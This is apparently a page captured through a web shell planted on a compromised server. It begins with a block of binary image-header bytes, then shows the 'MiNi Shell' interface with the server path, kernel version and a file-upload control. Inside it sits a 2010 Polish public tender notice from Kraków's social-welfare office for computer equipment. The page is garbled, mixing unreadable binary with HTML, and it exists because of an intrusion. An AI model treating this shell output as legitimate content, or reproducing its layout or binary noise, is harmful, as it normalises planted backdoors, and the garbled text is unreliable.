JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101129/388068-N-2010.html

<p class="kh_header"><b>Kraków: Dostawa sprzętu komputerowego oraz oprogramowania dla MOPS w Krakowie</b><br>
<b>Numer ogłoszenia: 388068 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego oraz oprogramowania dla MOPS w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CPV 48000000-8, 30232110-9, 30213000-5, 33195100-4, 30213100-6, 30237200-1
1	Przedmiotem zamówienia jest dostawa sprzętu komputerowego oraz oprogramowania dla MOPS w Krakowie, określonego w załączniku do formularza ofertowego, stanowiącego załącznik nr 1 do siwz.
2	Miejsce dostawy: Magazyn Centralny MOPS w Krakowie na ul. Józefińskiej 14, w godzinach: pn. 9:30 -16.00, wt.-pt. 8:00- 14:30. 
3	Wykonawca dostarczy zamawiany towar własnym transportem i na własny koszt, w sposób zapewniający jego całość i nienaruszalność. Opakowanie i sposób przewozu powinny odpowiadać jego właściwościom.
4	Dostarczony sprzęt i oprogramowanie będą fabrycznie nowe, nie będą nosić śladów użytkowania oraz zostaną dostarczone w oryginalnych, nienaruszonych opakowaniach.
5	Gwarancja na dostarczony sprzęt będzie zbiorcza i zostanie wystawiona przez Wykonawcę a nie Producenta. Osobną pozycją na fakturze będzie oprogramowanie. Dokument gwarancyjny będzie zawierać datę sprzedaży, zestawienie sprzętów z 
nr fabrycznymi oraz warunki gwarancji zgodnie z warunkami udzielenia zamówienia. Dokument zostanie podpisany przez upoważnioną osobę.
6	Naprawy gwarancyjne będą wykonywane w ciągu 24 godzin od momentu zgłoszenia awarii (faksem lub e-mailem). Do czasu naprawy nie wlicza się sobót oraz dni świątecznych.
7	W razie niemożności dotrzymania w/w terminu napraw Wykonawca dostarczy na czas naprawy sprzęt o analogicznych lub lepszych parametrach technicznych.
8	Serwis gwarancyjny będzie wykonywany w lokalach, w których będzie zlokalizowany sprzęt komputerowy, na koszt Wykonawcy. W szczególnie uzasadnionych przypadkach naprawy gwarancyjne mogą odbywać się poza lokalami Zamawiającego, jedynie za zgodą  Zamawiającego. Lokale mieszczą się na terenie Miasta Krakowa. 
9	Faktura oraz protokół przekazania będzie zawierać szczegółowe zestawienie towaru,  akcesoriów i oprogramowania /precyzyjne nazwy wszystkich elementów składowych
10	Zamawiający nie odbierze towaru w przypadku gdy Wykonawca przy dostawie nie  dostarczy również poprawnie wystawionej faktury, protokołu przekazania oraz gwarancji.
11	W przypadku stwierdzenia przez Zamawiającego w ciągu 5 dni od dostawy wad w dostarczonym towarze Wykonawca ma obowiązek wymienić wadliwy towar do 3 dni od daty otrzymania zgłoszenia.
12	Towar będzie kompletny z punktu widzenia celu jakiemu ma służyć i zdatny do bezpośredniego użycia zgodnie z przeznaczeniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 30.23.21.10-9, 30.21.30.00-5, 33.19.51.00-4, 30.21.31.00-6, 30.23.72.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do przetargu, Wykonawca jest zobowiązany do wniesienia wadium do dnia  7.12.2010 r. do godz. 9:00 w kwocie:
1)	I część zamówienia: 3500 zł.
2)	III część zamówienia: 550 zł.
3)	V część zamówienia: 650 zł.
4)	W przypadku składania oferty na wszystkie części zamówienia wadium wynosi: 
4700 zł.
2.	Wadium może być wnoszone w jednej lub kilku następujących formach określonych w art. 45 ust. 6. Ustawy 
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego 

 
4.	nr 80 1240 4722 1111 0000 4860 8042.
5.	Warunkiem uznania wpłaty wadium będzie załączone do oferty potwierdzenie bankowe wykonania przelewu na konto Zamawiającego.
6.	Wadium zostanie zwrócone w sytuacjach i na zasadach opisanych w art. 46 ust. 1, 2 i  4 Ustawy
7.	Zamawiający zatrzyma wadium gdy zajdą przesłanki, o których mowa w art. 46 ust. 4a 
i 5.
8.	Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca będzie zobowiązany wnieść wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza zmianę treści niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1)	zmiany dostarczanego towaru w stosunku do towaru zaoferowanego w ofercie, w przypadku, gdy towar przestanie być produkowany lub nie będzie dostępny na rynku,
2)	wydłużenia okresu gwarancji,
3)	miejsca i godzin dostawy towaru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?dok_id=27000<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 09:00, miejsce: Dzienik podawczy MOPS w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia w II części zamówienia jest finansowany ze środków UE w ramach projektu Pora na aktywność. 

Szczegółowy opis kryteriów oceny ofert.

I, II, III i VII część zamówienia:

Cena = 85 %, okres gwarancji = 15 %

                          Cmin	           Gn	 	
Ocena łączna = ----- x 85 % + ----- x 15 % 
                           Cn 	       Gmax	   
   
Cmin -  cena najniższa spośród ważnych ofert,
Cn -  cena podana przez danego Wykonawcę,
Gn - okres gwarancji podany przez danego Wykonawcę,
Gmax - maksymalny okres gwarancji spośród ważnych ofert,

Dla I części zamówienia okres gwarancji podany przez danego Wykonawcę zostanie obliczony wg poniższego wzoru:
Gn =  poz.1 x 7,1 % + poz. 2 x 23,5 % + poz.5 x 9 % + poz. 6 x 8,6 % + poz. 7 x 8,4 % + poz. 8 x 16,5 % + poz. 9 x 13,9 % + poz. 10 x 1 % + poz. 11 x 0,4 % + poz. 12 x 10,8 % + poz. 15 x 0,8 %.
Gmax =  poz.1 x 7,1 % + poz. 2 x 23,5 % + poz.5 x 9 % + poz. 6 x 8,6 % + poz. 7 x 8,4 % + poz. 8 x 16,5 % + poz. 9 x 13,9 % + poz. 10 x 1 % + poz. 11 x 0,4 % + poz. 12 x 10,8 % + poz. 15 x 0,8 %.

Dla II części zamówienia okres gwarancji podany przez danego Wykonawcę zostanie obliczony wg poniższego wzoru:
Gn = poz. 1 x 74,6 % + poz. 4 x 2 % + poz. 5 x 8,8 % + poz. 6 x 3,2 % + poz. 7 x 11,3 %
Gmax = poz. 1 x 74,6 % + poz. 4 x 2 % + poz. 5 x 8,8 % + poz. 6 x 3,2 % + poz. 7 x 11,3 %

Dla III części zamówienia okres gwarancji podany przez danego Wykonawcę zostanie obliczony wg poniższego wzoru:
Gn = poz. 1 x 13,3 % + poz. 2 x 7 % + poz. 3 x 2,3 % + poz. 4 x 12 % + poz. 5 x 0,9 % + poz. 6 x 64,5 %
Gmax = poz. 1 x 13,3 % + poz. 2 x 7 % + poz. 3 x 2,3 % + poz. 4 x 12 % + poz. 5 x 0,9 % + poz. 6 x 64,5 %

Wskazano pozycje asortymentu, stanowiącego załącznik do formularza ofertowego. Przyjęte wagi procentowe wynikają z udziału wartościowego sprzętu w danej części zamówienia.

 
IV, V, VI część zamówienia

Cena = 100 %
                          Cmin	         
Ocena łączna = ----- 
                           Cn 	          
Cmin -  cena najniższa spośród ważnych ofert,
Cn -  cena podana przez danego Wykonawcę,


Zamawiający wybierze ofertę, która uzyska najwyższą liczbę punktów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com